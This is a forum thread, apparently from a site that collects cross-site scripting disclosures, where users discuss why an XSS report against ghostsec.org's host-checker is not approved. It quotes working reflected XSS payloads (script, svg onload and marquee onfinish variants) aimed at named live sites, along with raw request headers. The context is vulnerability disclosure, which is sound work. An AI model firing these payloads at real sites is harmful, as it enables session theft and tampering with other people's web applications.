ghostsec.org submission not being approved

Questions or requests about submissions
Post Reply
ret2libc
Posts:62
Joined:Tue Nov 24, 2015 11:52 am
ghostsec.org submission not being approved

Post by ret2libc » Fri Dec 11, 2015 1:07 pm

this is a weird one to replicate, when you try it via GET it will give a 'not allowed' message
http://ghostsec.org/server.php?job=host ... Fscript%3E

could you test this manually by going to ghostsec.org -> tools -> host checker -> <script>alert('XSSPOSED')</script> as input
this definitely works.

also if someone can tell me how exactly i'd go about submitting this, that would be useful. here is the output from live http headers:

Code: Select all

m@m:~/Desktop$ cat header
http://ghostsec.org/server.php?job=hostCheck&u=%3Cscript%3Ealert(%27XSSPOSED%27)%3C%2Fscript%3E

GET /server.php?job=hostCheck&u=%3Cscript%3Ealert(%27XSSPOSED%27)%3C%2Fscript%3E HTTP/1.1
Host: ghostsec.org
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://ghostsec.org/
Cookie: 300gpBAK=R4178759823; 300gp=R394679152; PHPSESSID=b8b6865f79f7faf1c9ca1e129eb35fbc
Connection: keep-alive

HTTP/1.1 200 OK
Set-Cookie: 300gp=R394679152; path=/; expires=Fri, 11-Dec-2015 14:01:01 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Encoding: gzip
Transfer-Encoding: chunked
Date: Fri, 11 Dec 2015 12:58:38 GMT
Connection: keep-alive
X-Geo: varn35.rbx5
X-Geo-Port: 1011
X-Cacheable: Not cacheable: no-cache
----------------------------------------------------------
m@m:~/Desktop$ 

R3NW4
Posts:23
Joined:Thu Nov 26, 2015 4:45 pm

Re: ghostsec.org submission not being approved

Post by R3NW4 » Fri Dec 11, 2015 6:32 pm

i have the same problem :( with:
http://moonsy.com

User avatar
x1admin
Site Admin
Posts:3101
Joined:Sun Nov 15, 2015 7:04 pm

Re: ghostsec.org submission not being approved

Post by x1admin » Sat Dec 12, 2015 6:11 am

ret2libc wrote: could you test this manually by going to ghostsec.org -> tools -> host checker -> <script>alert('XSSPOSED')</script> as input
this definitely works.
cant reproduce

Spam404Online
Posts:296
Joined:Mon Nov 23, 2015 6:43 pm
Contact:

Re: ghostsec.org submission not being approved

Post by Spam404Online » Sat Dec 12, 2015 9:25 am

Maybe submit the following URL -

Code: Select all

http://ghostsec.org/server.php?job=hostCheck&u=%22%3E%3Csvg%2Fonload%3Dprompt(%2FXSSPOSED%2F)%3E
I would submit that and then if they got in touch it would likely result in a fix on the method to code execution you described :)

User avatar
mradamdavies
Posts:29
Joined:Wed Nov 25, 2015 3:00 pm
Contact:

Re: ghostsec.org submission not being approved

Post by mradamdavies » Sat Dec 12, 2015 7:16 pm

Works here:

Code: Select all

http://microderp.com/?&1=1 <marquee loop=1 width=0 onfinish=1/prompt`/XSSPOSED/`>derp</marquee>
Image

May need to set referer or something as clean session shows "not allowed"

ret2libc
Posts:62
Joined:Tue Nov 24, 2015 11:52 am

Re: ghostsec.org submission not being approved

Post by ret2libc » Sat Dec 12, 2015 9:53 pm

Yea that's the issue I'm getting with the 'not allowed' thing. Pretty sure that's why it isn't being accepted even tho it alerts fine for me at first

User avatar
mradamdavies
Posts:29
Joined:Wed Nov 25, 2015 3:00 pm
Contact:

Re: ghostsec.org submission not being approved

Post by mradamdavies » Sat Dec 12, 2015 10:29 pm

ROFL:

Code: Select all

http://i.imgur.com/lQ1VMLU.png

ret2libc
Posts:62
Joined:Tue Nov 24, 2015 11:52 am

Re: ghostsec.org submission not being approved

Post by ret2libc » Sun Dec 13, 2015 4:19 pm

I stil don't see how the admin was unable to manually reproduce this, works fine for me.

Post Reply

Who is online

Users browsing this forum: No registered users and 2 guests